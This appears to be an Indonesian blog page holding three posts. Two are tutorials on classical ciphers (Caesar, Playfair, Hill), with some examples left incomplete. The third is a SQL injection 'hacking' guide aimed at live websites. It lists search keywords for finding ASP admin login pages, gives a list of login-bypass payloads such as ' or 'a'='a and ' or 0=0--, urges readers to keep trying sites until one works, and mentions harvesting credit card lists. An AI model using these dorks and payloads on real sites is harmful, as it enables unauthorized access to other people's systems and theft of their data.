.:: Sugeng Rawuh ::.

Selamat datang di Bakul Semanggi, disini kita bisa berbagi ilmu, berbagi pengalaman dan berbagi cerita. Di dunia ini tidak ada yang tidak mungkin, semua pasti mungkin, itu hanya sebuah pemikiran saja. Andai kita memikirkan bisa, pasti semua akan bisa. For all mindset.

MIXED ALPHABETS

Diposting oleh Bakul Semanggi on Senin, 24 Mei 2010
Comments: (2)
Oke, sesuai janji saya di posting saya yang membahas tentang ENKRIPSI KLASIK. Kali ini saya akan menjelaskan tentang MIXED ALPHABETS..??
MIXED ALPHABETS ini adalah mengembangkan CAESAR CHIPER dengan mengkombinasikan substitusi dari 26 kemungkinan.

Kemungkinan Key yang ada:
>26! or lebih besar dari 4 x 10

- Cryptanalysis of the Caesar Chiper
> Dengan menggunakan letter frequency analysis

Single Letter Double Letter Triple Letter
E TH THE
T HE AND
R IN TIO
N ER ATI
I RE FOR
O ON THA
A AN TER
S EN RES


- Caracter Frequencies


- Playfair Chiper
> Algoritma Playfair didasarkan pada 5x5 matrik yang berisi karakter yang disusun berdasarkan keyword.
> Contoh : keyword -> monarchy
> Matrik :
M O N A R
C H Y B D
E F G I/J K
L P Q S T
U V W X Z

The matrix is constructed by filling in the letters of the keyword (minus duplicates) from left to right

and from top to bottom, and then filling in the remainder of the matrix with the remaining letters in alphabetic order. The letters I and J

count as one letter.


- Aturan Enkripsi :

1. Karakter kembar yang berdampingan dipisahkan dengan karakter lain, misalkan X sebagai karakter pemisah, kata balloon menjadi balxloxon.

2. Dua karakter yang berada dalam 1 baris, diganti dengan karakter disebelah kanannya (shift right). Contoh ar -> RM

3. Dua karakter yang berbeda dalam 1 kolom, diganti dengan karakter disebelah bawahnya (shift down). Contoh mu -> CM

4. Lainnya, setiap pasangan karakter diganti dengan karakter yang berada di baris yang sama dan berpotongan (intersection) dengan kolom dimana karakter pasangannya berada.

Contoh : hs -> BP

ea -> IM or JM


- Hill Chiper

> C = KP mod 26


> Contoh : paymoremoney -> p:15 ; a: 0 ; y:24

> Key :


Ok sekian dulu artikel kali ini, semoga artikel ini bermanfaat bagi para blogger smua.


Terima Kasih sudah mampir di sini.



Next artikel :

> Vigenere Chiper




ENKRIPSI KLASIK | KLASIK ENKRIPSI | ENKRIPSI | KLASIK

Diposting oleh Bakul Semanggi
Comments: (0)
Classical Cryptographic Techniques

- Mempunyai 2 teknik enkripsi
> substitusi : karakter dalam plaintext diganti dengan karakter lain.
> Transposisi (permutasi) : karakter dalam plaintext disusun dalam urutan yang berbeda.

Chipertext mungkin :
>> monoalphabetic : hanya menggunakan 1 teknik substitusi / tranposisi.
>> polyalphabetic : menggunakan beberapa teknik substisusi / transposisi.

- Caesar Chiper - a monoalphabetic chiper
>Mengganti setiap karakter dari plaintext dengan karakter lain dalam list yang sudah ditentukan jaraknya.

Contoh : teknik substitusi oleh Julius Caesar
eg. plaint : i came i saw i conquered
chiper : L FDPH L VDZ L FRQTXHUHG
ie mapping is \

plaint : abcdefghijklmnopqrstuvwxyz
chiper : DEFGHIJKLMNOPQRSTUVWXYZABC

> Encryption C=E(k,p)=(p + k) mod 26
> Decryption P=D(k,c)=(c - k) mod 26

(Penulisan dari -> plaint : huruf kecil ; chiper : huruf besar.
plain : meet me after the toga party
chiper : PHHW PH DIWHU WKH WRJD SDUWB)

(a b c d e f g h i j k l m
1 2 3 4 5 6 7 8 9 10 11 12)

- Kelemahan
> Mudah untuk melakukan Cryptanalysis dengan mencoba 25 kemungkinan key (teknik brute-force)

PHHW PH DIWHU WKH WRJD SDUWB

key :
- oggv og chvgt vjg vqic rctva
- nffu nf bgufs uif uphb qbsuz
- meet me after the toga party
- ldds ld zesdq sgd snfz ozqsx
- kccr kc ydrcp rfc rmey nyprw

" Sekian artikel kali ini, terima kasih sudah mampir di sini"

Next artikel :
- Mixed Alphabets

HACK DENGAN SQL INJECTION

Diposting oleh Bakul Semanggi on Jumat, 14 Mei 2010
Comments: (2)
Setelah baca2 sebuah buku yang berjudul SQL INJECTION. jadi ga sabar untuk memposting artikel ini. Ok artikel kali ini saya akan mengulas sedikit tentang SQL INJECTION dan HACK DENGAN SQL INJECTION. Pertama-tama, sekali lagi saya tekankan. Disini penulis hanya ingin membagi sebuah informasi yang ada. Dan hanya untuk menambah sebuah pengetahuan saja. Disini penulis tidak bertanggung jawab kalau seandainya artikel ini di implementasikan dengan maksud yang kurang baik.

SQL INJECTION????

> SQL injection adalah suatu teknik yang dapat dilakukan oleh cracker untuk dapat masuk kedalam system administrator tanpa mengetahui username dan password administrator terlebih dahulu dengan memanfaatkan perintah-perintah SQL yang dimasukkan kedalam database mesin server.

- SEBAB TERJADINYA
> Tidak adanya penanganan terhadap karakter – karakter tanda petik satu dan juga karakter double minus yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

- KARAKTERISTIK
> Teknik serangan ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. Selain itu, SQL Injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data-data yang berada didalam database. Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

- IMPLEMENTASI SQL INJECTION
> Masuk ke google atau Search Engine yang lain

> Masukan salah satu keyword berikut

> "/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
(anda bisa menambahi sendiri dan sesuaikan keinginan anda)

> Setelah itu bukalah satu link yang ditemukan oleh google. Kemungkinan anda akan menjumpai sebuah halaman login (user name dan password).

> Kemudian masukan kode berikut :
username: ' or 'a'='a
password: ' or 'a'='a (termasuk tanda petiknya)

> Jika berhasil, kemungkinan anda akan masuk ke admin panel, dimana anda bisa menambahkan berita, mengedit user yang lain, merubah about DLL. Jika beruntung anda bisa mendapatkan daftar kredit card yang banyak.

> Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.

> Banyak variasi kode yang mungkin, antara lain :
username: admin
password: ' or 'a'='a
atau bisa dimasukkan kedua-duanya misal :
' or 0=0-- ; " or 0=0--; or0=0--; ' or0=0#;
" or0=0 #; 'or'x'='x ; "or"x"="x ; ') or ('x'='x

> Cobalah sampai berhasil hingga anda bisa masuk ke admin panel.

(PERINGATAN : Jangan sekali-kali meubah apapun ketika berhasil masuk ke system database, karena termasuk kriminal dan mudah untuk di telusuri)

Sekian dulu artikel kali ini. Sampai bertemu di artikel selanjutnya.

Terima kasih.